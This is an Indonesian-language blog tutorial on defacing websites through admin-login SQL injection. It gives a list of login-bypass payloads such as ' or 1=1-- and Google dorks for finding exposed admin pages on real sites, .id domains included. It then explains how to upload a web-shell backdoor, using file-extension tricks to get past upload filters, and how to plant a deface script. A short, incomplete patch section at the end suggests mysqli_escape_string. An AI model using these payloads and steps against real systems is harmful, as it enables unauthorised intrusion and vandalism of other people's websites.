Lompat ke konten Lompat ke sidebar Lompat ke footer

Widget Atas Posting

Selamat Datang Di situs Tamatekno

Tutorial defacte POC Bypass Admin

 

Deface POC Bypass Admin


Sesungguhnya ini tidak jauh berbeda serta masih berhubungan dengan SQL Injection. Bila kita tahu, bug ini membolehkan seseorang attacker buat masuk selaku admin cuma dengan memasukan username serta password contoh semacam or 1=1 tanpa wajib repot- repot semacam halnya melaksanakan ekploitasi web.


Bimbingan Deface Bypass Admin Login


Pengertianya lumayan itu saja. Oiya buat yang masih belum paham ataupun pengen ketahui yang lebih jelas, mengapa ini dapat terjalin? Kemudian dimana letak kesalahan tersebut? Oke, aku telah mempersiapkan postingan selaku rujukan buat dapat kalian baca menimpa perihal ini.



Payload Bypass Admin


Dari sekian banyak query yang bertebaran di internet, disini aku hendak memberikan sebagian query yang kerap aku pakai buat bypass admin login web, antara lain selaku berikut:


admin' or '1'='1

admin' or '1'='1'#

admin' or 1=1 or ''='

'or 1=1 limit 1 -- -+

' or '1'='1

' or 'x'='x

' or 0=0 --

' or 0=0 #

' or 1=1--

' or 'one'='one

'or 1=1-- -

'or''='


Cuma segitu? Iya hanya itu saja, payload bypass admin login tersebut aku pakai dari dini aku memahami/ melaksanakan deface( 2015) hingga saat ini( tetapi telah tidak sering sekali). Nah, bila kalian memiliki payload yang lain bisa jadi dapat di share pada kolom pendapat supaya sahabat yang lain pula pada ketahui.


Baiklah tanpa berlama- lama, saat ini ayo kita ke inti pokok ulasan berikutnya, lestgooo.


Bimbingan Bypass Admin Login Website


Nah, apa saja yang dibutuhkan? Berikut antara lain:


1. Dork


2. Shell Backdoor


3. Script Deface


Uraian:


Dork~ Bila tidak memiliki sasaran kalian dapat mencari web yang terpaut vulnerability bypass admin login dengan dork, contoh dork misalnya.


"inurl:/admin/login.php"

"inurl:/admin/login.php" site:.id


Selebihnya kalian kembangkan lagi ya supaya dapat bisa yang segar.


Shell Backdoor~ File backdoor ini bermanfaat buat edit, upload serta lain sebagainya. Download here


Script Deface~ Bila belum memiliki kalian dapat unduh script deface melalui pencarian Google ataupun kalo dapat ya lebih baik buat sendiri saja.


Baiklah dari apa yang telah aku sebutkan( 3 bahan) tadi, bila kalian telah memiliki. Saat ini ayo kita ikuti sebagian bimbingan dibawah ini.


POC( Profesor End Concept) Bypass Admin Login


Step 1: Eksekusi Target


Hasil dari mencari sasaran dengan dork, kurang lebih semacam ini sasaran yang aku miliki.


http:// sasaran. com/ admin/ index. php


Nah saat ini, tinggal mengeksekusi web tersebut dapat ataupun tidaknya aku bisa masuk ke dashboard panel admin dengan memakai payload yang tadi aku sebutkan diatas serta aku berupaya memakai payload yang admin or 1=1 or=


Dikala terletak di dashboard panel admin login, kalian isikan username: admin or 1=1 or= password: admin or 1=1 or=


Setelah itu tinggal klik pada tombol Login web tersebut. Apabila sukses kalian hendak ditunjukan mengarah ke menu dashboard panel admin web tersebut, serta itu maksudnya kalian telah dapat mengakses segala isi web.


Butuh di ingat, tidak seluruh form login admin web dapat di injeksi dengan metode semacam ini, bila kandas mungkin telah di patch bugnya, kalian dapat coba payload yang lain ataupun cari sasaran yang lainya saja.


Step 2: Upload Shell


Bila kalian telah sukses masuk ke dashboard panel admin web sasaran kalian itu maksudnya saat ini kalian telah dapat upload shell, edit postingan serta lain sebagainya.


Kemudian gimana triknya upload shell backdoor?


Panduan: Bila kita tidak dapat upload shell backdoor disebabkan form upload tersebut cuma memperbolehkan upload file berformat". jpg,. gif,. jpeg" kita dapat mengakalinya dengan bypass extensi shell tersebut. Contoh misalnya semacam ini" shell. php. jpg, shell. jpg. php, shell. jpg. PhP" serta lain sebagainya.


Serta untungnya pada sasaran aku tidak sangat ribet wajib ini itu buat upload shell backdoornya alias tidak terdapat permasalahan sama sekali, kira- kira jika aku jelaskan proses ataupun alur upload shellnya begini.


Cari tempat upload

tempat upload ketemu di bagian menu partners

setelah itu tinggal upload shell backdoor extensi. php

Done tanpa wajib bypass shell.


Bila belum memiliki shell backdoor dapat unduh dari link berikut ini : Unduh Shell Backdoor


Step 3: Deface


Oke, sehabis sukses menanam shell backdoor pada web sasaran. Langkah berikutnya kita tinggal upload file script deface, bila mau menebas index. php tinggal cari aja di bagian directory home page web tersebut. Tetapi disini aku cuma menitipkan file saja tidak mengubah file index. php sama sekalipun.


Gimana bagi kalian gampang bukan? Jangan kurang ingat buat mencobanya sendiri ya tetapi tidak boleh kelewatan, disebabkan beresiko.


Lanjut aja yukk.


Terdapat baiknya jika kita sehabis melaksanakan deface web tersebut, kita pula dapat menolong mereka dengan menutup ataupun patch bug bypass admin login tanpa wajib memberi tahu terlebih dulu, lumayan jalani secara diam- diam serta anggap saja ini selaku bonus dari kalian gitu deh, heker baik hati wkwkk.


Buat triknya ikuti uraian pendek berikut ini.


Metode Patch Bug Bypass Admin Login


Sesungguhnya buat metode melaksanakan patch bug bypass admin pada web itu sangat gampang, kalian cuma lumayan dengan meningkatkan perintah mysqli_escape_string.


Berikut ini contoh source kode yang mempunyai vulnerability bypass admin login, aku hendak ambil bagian tertentu saja ya.


<?php
$message = "";
if(isset($_POST['submit'])) {
$username = ($_POST['username']);
$password = ($_POST['password']);
kode bla bla bla
kode bla bla bla
kode bla bla bla
} else {
$message = "Username and Password is not matched";
}
}
?>


Bila kita pahami pada source kode diatas, berikut ini merupakan kode dimana yang jadi permasalahan ialah dapat di bypass admin login.


$username = ($_POST['username']);
$password = ($_POST['password']);


Uraian begini, kita ketahui kalau kode tersebut tidak terdapat filterisasi kepribadian yang menyebabkan terdapatnya bug dimana seseorang attacker dapat bisa memasukan query injeksi serta bisa masuk ke dashboard panel admin sesuatu web.


Nah, hingga dari itu kita tambahkan saja kode ataupun guna mysqli_escape_string di bagian kode yang bisa menimbulkan bug tadi, bila digabungkan triknya semacam ini kodenya.


$username = mysqli_escape_string($con, $_POST['username']);
$password = mysqli_escape_string($con, $_POST['password']);


Telah mengerti kan triknya? Bila telah, Bagus deh!


Jadi sehabis meningkatkan filter pada bagian kode$username serta$password dengan guna mysqli_escape_string tersebut, seseorang attacker tidak hendak dapat menginjeksi admin login, mantap haha.


Penutup:


Demikian postingan simpel yang aku tulis ini, tentang Bimbingan Deface Bypass Admin Login serta Metode Patch Bug Bypass Admin bersumber pada pengalaman yang telah aku pelajari, mudah- mudahan bisa bermanfaat serta berguna buat seluruh orang. 

Posting Komentar untuk "Tutorial defacte POC Bypass Admin"

Jika anda menyukai artikel ini Anda dapat membagikannya ke teman agar teman anda membaca artikel ini. Gunakan tombol share yang tersedia di bawah atau di atas halaman ini.